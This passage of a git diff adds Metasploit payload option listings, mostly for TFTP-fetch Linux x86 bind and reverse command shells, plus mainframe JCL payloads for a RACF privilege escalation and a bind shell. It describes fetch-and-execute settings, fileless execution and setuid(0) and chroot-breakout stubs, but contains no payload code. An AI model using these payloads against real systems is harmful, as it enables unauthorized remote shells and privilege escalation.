channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..8987d03 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_ipv6_tcp.txt @@ -0,0 +1,80 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hwYbkpfki no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..d4eb7fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp.txt @@ -0,0 +1,80 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JLfklCuZVxH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..de4ab7f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_bind_tcp_random_port.txt @@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vACfbeFDF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt new file mode 100644 index 0000000..8ab0da0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 58835 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WSvIzolyJLk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt new file mode 100644 index 0000000..e6e0e04 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/tftp/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KCIFYNOoyJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG 0ZdN yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..d48cefb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt @@ -0,0 +1,89 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ooLfBQckcVFJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..2800829 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt @@ -0,0 +1,87 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kEcVALdVUrO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt b/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt new file mode 100644 index 0000000..19920c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt @@ -0,0 +1,40 @@ + + Name: JCL to Escalate Privileges + Module: payload/cmd/mainframe/apf_privesc_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 3156 + Rank: Normal + +Provided by: + Bigendian Smalls + Ayoub + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +APFLIB SYS1.LINKLIB yes APF Authorized Library to use +JCLASS A yes Job Class for JCL JOB card +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card +RPORT 21 yes The target port + +Description: + Elevate privileges for user. Adds + SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using + an unsecured/updateable APF authorized library (APFLIB) and updating + the user's ACEE using this program/library. Note: This privesc only + works with z/OS systems using RACF, no other ESM is supported. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt b/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt new file mode 100644 index 0000000..a12f17b --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt @@ -0,0 +1,43 @@ + + Name: Z/OS (MVS) Command Shell, Bind TCP + Module: payload/cmd/mainframe/bind_shell_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 10712 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +LHOST 0.0.0.0 yes The listen address (an interface may be specified) +LPORT 32700 yes The listen port +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card +RHOST no The target address + +Description: + Provide JCL which creates a bind shell + This implementation does not include ebcdic character translation, + so a client with translation capabilities is required. MSF handles + this automatically. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt b/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt new file mode 100644 index 0000000..205f9ba --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt @@ -0,0 +1,39 @@ + + Name: Generic JCL Test for Mainframe Exploits + Module: payload/cmd/mainframe/generic_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 150 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card + +Description: + Provide JCL which can be used to submit + a job to JES2 